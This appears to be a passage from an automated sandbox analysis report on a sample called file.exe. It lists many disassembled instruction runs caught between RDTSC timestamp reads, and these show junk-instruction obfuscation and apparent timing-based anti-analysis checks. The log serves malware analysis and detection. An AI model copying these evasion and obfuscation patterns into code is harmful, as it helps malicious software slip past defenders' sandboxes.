Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9FC1CA second address: 9FC26E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a add dword ptr [esp], 52332493h 0x00000011 mov ecx, dword ptr [ebp+122D2B68h] 0x00000017 push 00000003h 0x00000019 jmp 00007F0B09070BD7h 0x0000001e push 00000000h 0x00000020 mov ch, FCh 0x00000022 push 00000003h 0x00000024 push edx 0x00000025 xor dword ptr [ebp+122D28D6h], edx 0x0000002b pop esi 0x0000002c call 00007F0B09070BD9h 0x00000031 jnl 00007F0B09070BC8h 0x00000037 pop edi 0x00000038 call 00007F0B09070BC9h 0x0000003d jmp 00007F0B09070BD7h 0x00000042 push eax 0x00000043 push eax 0x00000044 push ebx 0x00000045 push ebx 0x00000046 pop ebx 0x00000047 pop ebx 0x00000048 pop eax 0x00000049 mov eax, dword ptr [esp+04h] 0x0000004d pushad 0x0000004e push eax 0x0000004f push edx 0x00000050 pop edx 0x00000051 pop eax 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007F0B09070BD2h 0x00000059 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9FC4B0 second address: 9FC4B5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9FC4B5 second address: 9FC4E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xor dword ptr [esp], 4DDEF6C5h 0x0000000e movzx esi, bx 0x00000011 lea ebx, dword ptr [ebp+1244E084h] 0x00000017 mov dword ptr [ebp+122D220Fh], esi 0x0000001d xchg eax, ebx 0x0000001e jmp 00007F0B09070BCDh 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 push ecx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9FC4E6 second address: 9FC4EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FC4EB second address: 9FC508 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0B09070BD8h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F35F4 second address: 9F35FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F35FC second address: 9F3610 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0B09070BCEh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1C46C second address: A1C470 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1C5EF second address: A1C61D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F0B09070BD2h 0x00000008 jmp 00007F0B09070BD3h 0x0000000d pop esi 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1C79D second address: A1C7F2 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0B08CB6D16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F0B08CB6D22h 0x00000012 jmp 00007F0B08CB6D28h 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 popad 0x0000001a pop edx 0x0000001b pushad 0x0000001c jmp 00007F0B08CB6D21h 0x00000021 jo 00007F0B08CB6D1Eh 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1CC21 second address: A1CC3B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0B09070BD4h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1CC3B second address: A1CC40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1CC40 second address: A1CC46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1CC46 second address: A1CC5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F0B08CB6D22h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1D07B second address: A1D0D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007F0B09070BD9h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007F0B09070BD1h 0x00000015 pushad 0x00000016 jp 00007F0B09070BC6h 0x0000001c jmp 00007F0B09070BCDh 0x00000021 jnp 00007F0B09070BC6h 0x00000027 popad 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c jbe 00007F0B09070BC6h 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1D215 second address: A1D243 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007F0B08CB6D29h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jc 00007F0B08CB6D16h 0x00000014 jp 00007F0B08CB6D16h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1D3B8 second address: A1D3E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jc 00007F0B09070BD1h 0x0000000b jmp 00007F0B09070BCBh 0x00000010 jmp 00007F0B09070BCCh 0x00000015 popad 0x00000016 push ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1D3E0 second address: A1D3E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1D3E6 second address: A1D405 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F0B09070BD6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1D590 second address: A1D5AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B08CB6D23h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E7965 second address: 9E796B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E796B second address: 9E7996 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F0B08CB6D1Dh 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d jmp 00007F0B08CB6D24h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1DCE4 second address: A1DCF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 jo 00007F0B09070BCCh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1DCF3 second address: A1DCF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1E170 second address: A1E1B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0B09070BCCh 0x00000009 popad 0x0000000a jno 00007F0B09070BDDh 0x00000010 push eax 0x00000011 push edx 0x00000012 jne 00007F0B09070BC6h 0x00000018 jmp 00007F0B09070BD2h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1E45B second address: A1E461 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1E461 second address: A1E46B instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0B09070BC6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1E46B second address: A1E474 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A229C7 second address: A229D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F0B09070BC6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EB02A second address: 9EB04F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jns 00007F0B08CB6D16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F0B08CB6D26h 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2AA68 second address: A2AA7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jg 00007F0B09070BC6h 0x0000000e jc 00007F0B09070BC6h 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2AA7D second address: A2AAA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F0B08CB6D16h 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F0B08CB6D22h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2AAA1 second address: A2AAA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2AC47 second address: A2AC4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2AC4F second address: A2AC57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2AC57 second address: A2AC77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0B08CB6D26h 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2AC77 second address: A2AC8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 jmp 00007F0B09070BCCh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2AEFA second address: A2AF14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0B08CB6D1Fh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2AF14 second address: A2AF1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F0B09070BC6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2B4B7 second address: A2B4BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2B4BB second address: A2B4C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2F991 second address: A2F995 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2F995 second address: A2F9A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2F9A1 second address: A2F9AB instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0B08CB6D16h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A301B8 second address: A301E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F0B09070BD8h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jng 00007F0B09070BCCh 0x00000014 jne 00007F0B09070BC6h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A30D0C second address: A30D29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jns 00007F0B08CB6D1Ch 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jnp 00007F0B08CB6D18h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A30D29 second address: A30D2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A30F3E second address: A30F48 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0B08CB6D16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A30F48 second address: A30F56 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3175D second address: A317C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B08CB6D21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 popad 0x00000011 jbe 00007F0B08CB6D18h 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a nop 0x0000001b push 00000000h 0x0000001d push ebp 0x0000001e call 00007F0B08CB6D18h 0x00000023 pop ebp 0x00000024 mov dword ptr [esp+04h], ebp 0x00000028 add dword ptr [esp+04h], 0000001Ch 0x00000030 inc ebp 0x00000031 push ebp 0x00000032 ret 0x00000033 pop ebp 0x00000034 ret 0x00000035 mov esi, dword ptr [ebp+122D39DDh] 0x0000003b push 00000000h 0x0000003d push 00000000h 0x0000003f jmp 00007F0B08CB6D1Eh 0x00000044 push eax 0x00000045 push ecx 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A317C6 second address: A317CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A321C6 second address: A321CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A32042 second address: A3205F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0B09070BD9h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3205F second address: A32063 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A33193 second address: A3319F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push ebx 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3319F second address: A33201 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push esi 0x0000000a call 00007F0B08CB6D18h 0x0000000f pop esi 0x00000010 mov dword ptr [esp+04h], esi 0x00000014 add dword ptr [esp+04h], 00000014h 0x0000001c inc esi 0x0000001d push esi 0x0000001e ret 0x0000001f pop esi 0x00000020 ret 0x00000021 mov edi, ebx 0x00000023 push 00000000h 0x00000025 mov esi, 0B828466h 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push ebp 0x0000002f call 00007F0B08CB6D18h 0x00000034 pop ebp 0x00000035 mov dword ptr [esp+04h], ebp 0x00000039 add dword ptr [esp+04h], 0000001Ch 0x00000041 inc ebp 0x00000042 push ebp 0x00000043 ret 0x00000044 pop ebp 0x00000045 ret 0x00000046 or esi, dword ptr [ebp+122D1CB4h] 0x0000004c xchg eax, ebx 0x0000004d pushad 0x0000004e js 00007F0B08CB6D1Ch 0x00000054 push eax 0x00000055 push edx 0x00000056 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A33C3E second address: A33C48 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0B09070BC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A339A5 second address: A339A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A33C48 second address: A33C61 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B09070BCBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d jc 00007F0B09070BC6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A343EF second address: A343F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A343F4 second address: A343FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A38B07 second address: A38B0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A38B0B second address: A38B0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A35888 second address: A3588C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A36239 second address: A36253 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0B09070BC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0B09070BCEh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A36D8E second address: A36D92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3C0FA second address: A3C119 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0B09070BD2h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3C119 second address: A3C12D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0B08CB6D20h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3C12D second address: A3C18F instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0B09070BC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov dword ptr [ebp+122D1BF3h], edx 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push ebx 0x00000018 call 00007F0B09070BC8h 0x0000001d pop ebx 0x0000001e mov dword ptr [esp+04h], ebx 0x00000022 add dword ptr [esp+04h], 0000001Dh 0x0000002a inc ebx 0x0000002b push ebx 0x0000002c ret 0x0000002d pop ebx 0x0000002e ret 0x0000002f jmp 00007F0B09070BD5h 0x00000034 or bx, 3B34h 0x00000039 push 00000000h 0x0000003b mov ebx, 455370E1h 0x00000040 xchg eax, esi 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 push ebx 0x00000046 pop ebx 0x00000047 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3C18F second address: A3C19D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B08CB6D1Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3B3CB second address: A3B3CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3C2F4 second address: A3C2F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3D16F second address: A3D173 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3D173 second address: A3D177 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3C3F0 second address: A3C3F5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3C3F5 second address: A3C416 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007F0B08CB6D1Bh 0x00000010 jmp 00007F0B08CB6D1Ah 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3E254 second address: A3E2D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B09070BD8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push eax 0x00000010 call 00007F0B09070BC8h 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc eax 0x00000023 push eax 0x00000024 ret 0x00000025 pop eax 0x00000026 ret 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b mov dword ptr [ebp+122D58CBh], edi 0x00000031 push eax 0x00000032 pushad 0x00000033 pushad 0x00000034 jmp 00007F0B09070BD1h 0x00000039 jg 00007F0B09070BC6h 0x0000003f popad 0x00000040 pushad 0x00000041 jmp 00007F0B09070BD3h 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4029D second address: A402A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A41227 second address: A4129B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007F0B09070BC8h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 0000001Bh 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 mov edi, ecx 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a push ebp 0x0000002b call 00007F0B09070BC8h 0x00000030 pop ebp 0x00000031 mov dword ptr [esp+04h], ebp 0x00000035 add dword ptr [esp+04h], 0000001Dh 0x0000003d inc ebp 0x0000003e push ebp 0x0000003f ret 0x00000040 pop ebp 0x00000041 ret 0x00000042 and bh, FFFFFFD3h 0x00000045 push 00000000h 0x00000047 mov edi, ecx 0x00000049 xchg eax, esi 0x0000004a push edx 0x0000004b push eax 0x0000004c push edx 0x0000004d jmp 00007F0B09070BD3h 0x00000052 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4129B second address: A412D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B08CB6D24h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edi 0x0000000c pushad 0x0000000d jmp 00007F0B08CB6D27h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A403E4 second address: A403E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
